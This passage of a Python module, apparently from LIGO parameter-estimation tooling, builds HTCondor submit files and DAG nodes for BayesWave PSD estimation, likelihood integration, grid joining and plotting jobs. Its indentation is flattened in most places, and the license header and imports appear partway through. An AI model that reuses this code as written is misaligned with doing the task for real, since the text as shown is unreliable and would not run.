ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step0(tag='PSD_BW', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for the BayesWave stage of PSD estimation.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BayesWave
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo " + ifo)
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
ile_job.add_opt(ifo+"-timeslide", str(0.0))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
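# ---------------------------------------------------------------------------
# Illustrative sketch (not exercised anywhere in this module): chaining the two
# legacy BW PSD stages, BayesWave (step 0) followed by BayesWavePost (step 1),
# as parent/child DAG nodes.  The channel names, cache file and GPS time are
# hypothetical placeholders.
# ---------------------------------------------------------------------------
def _example_psd_bw_two_step_dag(log_dir="logs/"):
    """Minimal sketch, assuming glue.pipeline parent/child semantics."""
    channel_dict = {"H1": ["GDS-CALIB_STRAIN", 20], "L1": ["GDS-CALIB_STRAIN", 20]}
    dag = pipeline.CondorDAG(log_dir + "psd_bw.dag.log")
    dag.set_dag_file("psd_bw")
    step0_job, _ = write_psd_sub_BW_step0(tag='PSD_BW', log_dir=log_dir,
                                          cache_file="local.cache",
                                          channel_dict=channel_dict,
                                          event_time=1126259462.4)
    step1_job, _ = write_psd_sub_BW_step1(tag='PSD_BW_post', log_dir=log_dir,
                                          cache_file="local.cache",
                                          channel_dict=channel_dict,
                                          event_time=1126259462.4)
    node0 = pipeline.CondorDAGNode(step0_job)
    node0.add_macro("macroevent", 0)
    node1 = pipeline.CondorDAGNode(step1_job)
    node1.add_macro("macroevent", 0)
    node1.add_parent(node0)   # BayesWavePost consumes the BayesWave run directory
    dag.add_node(node0)
    dag.add_node(node1)
    dag.write_sub_files()
    dag.write_dag()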
def write_resample_sub(tag='resample', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("util_ResampleILEOutputWithExtrinsic.py")  # resamples ILE output, folding in the extrinsic samples
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt('fname',file_input)
ile_job.add_opt('fname-out',file_output)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_cat_sub(tag='cat', exe=None, file_prefix=None,file_postfix=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'cat' job: concatenate the per-worker output files
matching file_prefix*file_postfix into a single file_output, via a generated catjob.sh
"""
exe = exe or which("find")  # used to locate the per-worker files being concatenated
exe_switch = which("switcheroo") # tool for patterend search-replace, to fix first line of output file
cmdname = 'catjob.sh'
with open(cmdname,'w') as f:
f.write("#! /bin/bash\n")
f.write(exe+" . -name '"+file_prefix+"*"+file_postfix+"' -exec cat {} \; | sort -r | uniq > "+file_output+";\n")
f.write(exe_switch + " 'm1 ' '# m1 ' "+file_output) # add standard prefix
os.system("chmod a+x "+cmdname)
ile_job = pipeline.CondorDAGJob(universe=universe, executable='catjob.sh')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# ile_job.add_arg(" . -name '" + file_prefix + "*" +file_postfix+"' -exec cat {} \; ")
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convertpsd_sub(tag='convert_psd', exe=None, ifo=None,file_input=None,target_dir=None,arg_str='',log_dir=None, universe='local',**kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("convert_psd_ascii2xml")  # converts an ASCII PSD into the XML format used downstream
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_opt("fname-psd-ascii",file_input)
ile_job.add_opt("ifo",ifo)
ile_job.add_arg("--conventional-postfix")
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if not (target_dir is None):
# Copy output PSD into place
ile_job.add_condor_cmd("+PostCmd", '" cp '+ifo+'-psd.xml.gz ' + target_dir +'"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_joingrids_sub(tag='join_grids', exe=None, universe='vanilla', input_pattern=None,target_dir=None,output_base=None,log_dir=None,n_explode=1, gzip="/usr/bin/gzip", old_add=True, **kwargs):
"""
Write a submit file to join the exploded per-worker grid files back into a single XML grid. Called once per iteration.
"""
exe = exe or which("ligolw_add")  # merges the per-worker overlap-grid XML documents
# exe_here = "my_join.sh"
# with open(exe_here,'w') as f:
# f.write("#! /bin/bash \n")
# f.write(r"""
# #!/bin/bash
# # Modules and scripts run directly from repository
# # Note the repo and branch are self-referential ! Not a robust solution long-term
# # Exit on failure:
# # set -e
# {} {} > {}/{}.xml
# gzip {}.{}.xml""".format(exe,input_pattern,target_dir,output_base,target_dir,output_base) )
# os.system("chmod a+x "+exe_here)
# exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
fname_out =target_dir + "/" +output_base + ".xml.gz"
ile_job.add_arg("--output="+fname_out)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
explode_str = ""
for indx in np.arange(n_explode):
explode_str+= " {}/{}-{}.xml.gz ".format(working_dir,output_base,indx)
explode_str += " {}/{}.xml.gz ".format(working_dir,output_base)
ile_job.add_arg(explode_str)
# ile_job.add_arg("overlap-grid*.xml.gz") # working in our current directory
if old_add:
ile_job.add_opt("ilwdchar-compat",'') # needed?
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
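# ---------------------------------------------------------------------------
# Illustrative sketch (not exercised anywhere in this module): a single
# join-grids node that merges the exploded per-worker grids
# <output_base>-0.xml.gz ... <output_base>-(n_explode-1).xml.gz back into one
# <output_base>.xml.gz.  Directory names below are hypothetical placeholders.
# ---------------------------------------------------------------------------
def _example_joingrids_node(dag, log_dir="rundir/logs/", n_explode=4):
    """Minimal sketch, assuming the default rundir/logs working-directory layout."""
    join_job, _ = write_joingrids_sub(tag='join_grids', log_dir=log_dir,
                                      target_dir=".", output_base="overlap-grid",
                                      n_explode=n_explode)
    node = pipeline.CondorDAGNode(join_job)
    dag.add_node(node)
    return node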
def write_subdagILE_sub(tag='subdag_ile', exe=None, universe='vanilla', submit_file=None,input_pattern=None,target_dir=None,output_suffix=None,log_dir=None,sim_xml=None, **kwargs):
"""
Write a submit file for a job that builds the ILE sub-DAG for one iteration (one ILE node per event in sim_xml), via create_ile_sub_dag.py.
"""
exe = exe or which("create_ile_sub_dag.py")
subfile = submit_file or 'ILE.sub'
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_arg("--target-dir "+target_dir)
ile_job.add_arg("--output-suffix "+output_suffix)
ile_job.add_arg("--submit-script "+subfile)
ile_job.add_arg("--macroiteration $(macroiteration)")
ile_job.add_arg("--sim-xml "+sim_xml)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
# Copyright (C) 2013 Evan Ochsner
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
A collection of routines to manage Condor workflows (DAGs).
"""
import os, sys
import numpy as np
from time import time
from hashlib import md5
from glue import pipeline
__author__ = "Evan Ochsner <evano@gravity.phys.uwm.edu>, Chris Pankow <pankow@gravity.phys.uwm.edu>"
# Taken from
# http://pythonadventures.wordpress.com/2011/03/13/equivalent-of-the-which-command-in-python/
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
def which(program):
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file): return exe_file
return None
def mkdir(dir_name):
try :
os.mkdir(dir_name)
except OSError:
pass
def generate_job_id():
"""
Generate a unique md5 hash for use as a job ID.
Borrowed and modified from the LAL code in glue/glue/pipeline.py
"""
t = str( int( time() * 1000 ) )
r = str( int( np.random.random() * 100000000000000000 ) )
return md5((t + r).encode()).hexdigest()  # hashlib requires bytes in python3
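# ---------------------------------------------------------------------------
# Illustrative sketch of the small helpers above (paths and names hypothetical):
# ---------------------------------------------------------------------------
def _example_helper_usage():
    """Minimal sketch; returns the resolved path (or None) and a fresh job id."""
    exe = which("integrate_likelihood_extrinsic")  # full path if found on PATH, else None
    mkdir("logs")                                  # silently ignores an existing directory
    run_id = generate_job_id()                     # 32-character md5 hex string, new each call
    return exe, run_id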
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
def write_integrate_likelihood_extrinsic_grid_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Like the other case (below), but modified to use the sim_xml
and loop over 'event'
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'sim' is the path to the XML file with the grid
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("event")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
return ile_job, ile_sub_name
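# ---------------------------------------------------------------------------
# Illustrative sketch (not exercised anywhere in this module): building a DAG
# from the grid-based ILE job above, one node per 'event' (row) of the sim-xml
# grid.  The channel/PSD/cache names are hypothetical placeholders.
# ---------------------------------------------------------------------------
def _example_ile_grid_dag(n_events=10, log_dir="logs/"):
    """Minimal sketch, assuming glue.pipeline var-opt macro semantics."""
    dag = pipeline.CondorDAG(log_dir + "ile_grid.dag.log")
    dag.set_dag_file("marginalize_extrinsic_parameters_grid")
    ile_job, _ = write_integrate_likelihood_extrinsic_grid_sub(
        tag='integrate', log_dir=log_dir,
        cache_file="local.cache",
        sim_xml="overlap-grid.xml.gz",
        channel_name=["H1=GDS-CALIB_STRAIN", "L1=GDS-CALIB_STRAIN"],
        psd_file=["H1=H1-psd.xml.gz", "L1=L1-psd.xml.gz"])
    for event_id in range(n_events):
        node = pipeline.CondorDAGNode(ile_job)
        node.add_macro("macromassid", 0)        # only used to label the log files
        node.add_var_opt("event", event_id)     # becomes --event <id> via $(macroevent)
        dag.add_node(node)
    dag.write_sub_files()
    dag.write_dag()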
# FIXME: Keep in sync with arguments of integrate_likelihood_extrinsic
def write_integrate_likelihood_extrinsic_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'coinc' is the path to a coincident XML file, from which masses and
times will be drawn FIXME: remove this once it's no longer needed.
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("mass1")
ile_job.add_var_opt("mass2")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
return ile_job, ile_sub_name
def write_result_coalescence_sub(tag='coalesce', exe=None, log_dir=None, output_dir="./", use_default_cache=True):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("ligolw_sqlite")
sql_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
sql_sub_name = tag + '.sub'
sql_job.set_sub_file(sql_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
sql_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
sql_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
sql_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if use_default_cache:
sql_job.add_opt("input-cache", "ILE_$(macromassid).cache")
else:
sql_job.add_arg("$(macrofiles)")
#sql_job.add_arg("*$(macromassid)*.xml.gz")
sql_job.add_opt("database", "ILE_$(macromassid).sqlite")
#if os.environ.has_key("TMPDIR"):
#tmpdir = os.environ["TMPDIR"]
#else:
#print >>sys.stderr, "WARNING, TMPDIR environment variable not set. Will default to /tmp/, but this could be dangerous."
#tmpdir = "/tmp/"
tmpdir = "/dev/shm/"
sql_job.add_opt("tmp-space", tmpdir)
sql_job.add_opt("verbose", None)
sql_job.add_condor_cmd('getenv', 'True')
sql_job.add_condor_cmd('request_memory', '1024')
return sql_job, sql_sub_name
def write_posterior_plot_sub(tag='plot_post', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to plot likelihood contours (e.g. in mchirp/eta) from the coalesced ILE output
"""
exe = exe or which("plot_like_contours")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("show-points", None)
plot_job.add_opt("dimension1", "mchirp")
plot_job.add_opt("dimension2", "eta")
plot_job.add_opt("input-cache", "ILE_all.cache")
plot_job.add_opt("log-evidence", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '1024')
return plot_job, plot_sub_name
def write_tri_plot_sub(tag='plot_tri', injection_file=None, exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to make a triangle (corner) plot from the coalesced ILE output
"""
exe = exe or which("make_triplot")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("output", "ILE_triplot_$(macromassid).png")
if injection_file is not None:
plot_job.add_opt("injection", injection_file)
plot_job.add_arg("ILE_$(macromassid).sqlite")
plot_job.add_condor_cmd('getenv', 'True')
#plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_1dpos_plot_sub(tag='1d_post_plot', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to make 1d cumulative posterior plots from the coalesced ILE output
"""
exe = exe or which("postprocess_1d_cumulative")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("save-sampler-file", "ILE_$(macromassid).sqlite")
plot_job.add_opt("disable-triplot", None)
plot_job.add_opt("disable-1d-density", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
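# ---------------------------------------------------------------------------
# Illustrative sketch (not exercised anywhere in this module): hanging the
# sqlite coalescence and triplot jobs off a completed set of ILE nodes; the
# posterior-plot and 1d-posterior jobs above follow the same pattern.
# 'mass_id' and the parent list are hypothetical placeholders.
# ---------------------------------------------------------------------------
def _example_postprocessing_plot_nodes(dag, ile_nodes, mass_id=0, log_dir="logs/"):
    """Minimal sketch, assuming glue.pipeline parent/child semantics."""
    sql_job, _ = write_result_coalescence_sub(tag='coalesce', log_dir=log_dir)
    tri_job, _ = write_tri_plot_sub(tag='plot_tri', log_dir=log_dir)
    sql_node = pipeline.CondorDAGNode(sql_job)
    sql_node.add_macro("macromassid", mass_id)   # selects ILE_<massid>.cache / .sqlite
    tri_node = pipeline.CondorDAGNode(tri_job)
    tri_node.add_macro("macromassid", mass_id)
    for parent in ile_nodes:
        sql_node.add_parent(parent)
    tri_node.add_parent(sql_node)                # the triplot reads ILE_<massid>.sqlite
    dag.add_node(sql_node)
    dag.add_node(tri_node)
    return tri_node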
def write_CIP_sub(tag='integrate', exe=None, input_net='all.net',output='output-ILE-samples',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=8192,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for launching jobs to construct the intrinsic posterior (CIP) from the marginalized likelihoods produced by ILE.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for CIP
"""
exe = exe or which("util_ConstructIntrinsicPosterior_GenericCoordinates.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
